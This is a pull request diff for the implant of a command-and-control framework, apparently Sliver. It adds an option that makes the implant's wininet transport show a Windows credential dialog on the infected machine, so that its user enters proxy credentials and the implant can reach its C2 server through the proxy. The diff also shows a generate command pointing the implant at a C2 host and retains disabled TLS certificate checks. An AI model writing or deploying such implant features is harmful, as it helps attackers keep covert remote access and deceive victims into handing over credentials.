### PR TITLE
Add wininet driver option to ask user for proxy password

### DIFF
--- a/implant/sliver/transports/httpclient/drivers/win/wininet/user32_windows.go
+++ b/implant/sliver/transports/httpclient/drivers/win/wininet/user32_windows.go
@@ -1,0 +1,16 @@
+package wininet
+
+import (
+	"golang.org/x/sys/windows"
+)
+
+var (
+	libuser32 = windows.NewLazySystemDLL("User32")
+)
+
+func GetDesktopWindow() uintptr {
+
+	ret, _, _ := libuser32.NewProc("GetDesktopWindow").Call()
+
+	return ret
+}

--- a/implant/sliver/transports/httpclient/drivers/win/wininet/wininet_windows.go
+++ b/implant/sliver/transports/httpclient/drivers/win/wininet/wininet_windows.go
@@ -413,3 +413,34 @@ func InternetSetOptionW(
 
 	return nil
 }
+
+// InternetErrorDlg is from wininet.h
+func InternetErrorDlg(
+	hWnd uintptr,
+	hRequest uintptr,
+	dwError uint32,
+	dwFlags uint32,
+	lppvData *[]byte,
+) (uintptr, error) {
+	var err error
+	var buf []byte
+	var proc string = "InternetErrorDlg"
+	var success uintptr
+
+	buf = make([]byte, 1024) //arbitrary size (safe?)
+
+	success, _, err = wininet.NewProc(proc).Call(
+		uintptr(hWnd),
+		hRequest,
+		uintptr(dwError),
+		uintptr(dwFlags),
+		uintptr(unsafe.Pointer(&buf[0])),
+	)
+	if success == 0 {
+		return success, fmt.Errorf("%s: %w", proc, err)
+	}
+
+	*lppvData = buf
+
+	return success, nil
+}

--- a/implant/sliver/transports/httpclient/drivers/win/wininet/wininet_windows.go
+++ b/implant/sliver/transports/httpclient/drivers/win/wininet/wininet_windows.go
@@ -422,22 +422,22 @@ func InternetErrorDlg(
 	dwFlags uint32,
 	lppvData *[]byte,
 ) (uintptr, error) {
-	var err error
 	var buf []byte
 	var proc string = "InternetErrorDlg"
 	var success uintptr
 
 	buf = make([]byte, 1024) //arbitrary size (safe?)
 
-	success, _, err = wininet.NewProc(proc).Call(
+	success, _, _ = wininet.NewProc(proc).Call(
 		uintptr(hWnd),
 		hRequest,
 		uintptr(dwError),
 		uintptr(dwFlags),
 		uintptr(unsafe.Pointer(&buf[0])),
 	)
-	if success == 0 {
-		return success, fmt.Errorf("%s: %w", proc, err)
+	// we expect 12032 if user hits okay, otherwise we return the response code as an error
+	if uint32(success) != ERROR_INTERNET_FORCE_RETRY {
+		return success, fmt.Errorf("%s: %s", proc, success)
 	}
 
 	*lppvData = buf

--- a/implant/sliver/transports/httpclient/drivers_windows.go
+++ b/implant/sliver/transports/httpclient/drivers_windows.go
@@ -58,5 +58,6 @@ func WininetDriver(origin string, secure bool, opts *HTTPOptions) (HTTPDriver, e
 		return nil, err
 	}
 	wininetClient.TLSClientConfig.InsecureSkipVerify = true
+	wininetClient.AskProxyCreds = opts.AskProxyCreds
 	return wininetClient, nil
 }

--- a/implant/sliver/transports/httpclient/httpclient.go
+++ b/implant/sliver/transports/httpclient/httpclient.go
@@ -74,6 +74,7 @@ type HTTPOptions struct {
 	ProxyConfig   string
 	ProxyUsername string
 	ProxyPassword string
+	AskProxyCreds bool
 }
 
 // ParseHTTPOptions - Parse c2 specific configuration options
@@ -112,6 +113,7 @@ func ParseHTTPOptions(c2URI *url.URL) *HTTPOptions {
 		ProxyConfig:   c2URI.Query().Get("proxy"),
 		ProxyUsername: c2URI.Query().Get("proxy-username"),
 		ProxyPassword: c2URI.Query().Get("proxy-password"),
+		AskProxyCreds: c2URI.Query().Get("ask-proxy-creds") == "true",
 	}
 }
 


### PR DESCRIPTION
Allow user to tell wininet to prompt the user for credentials if none are saved in the credential cache

`generate --http http://c2ip/?driver=wininet&ask-proxy-creds=true --debug`

Uses `InternetErrorDlg` and `GetDesktopWindow()` to automatically prompt and authenticate.

![image](https://user-images.githubusercontent.com/95310663/161344027-4f762f43-6e13-4b20-a180-26cd7665fe5b.png)

Tested with Win10 and a basic auth squid proxy.

https://docs.microsoft.com/en-us/windows/win32/api/wininet/nf-wininet-interneterrordlg
https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getdesktopwindow

Not sure about the real world usage on this, so feel free to close...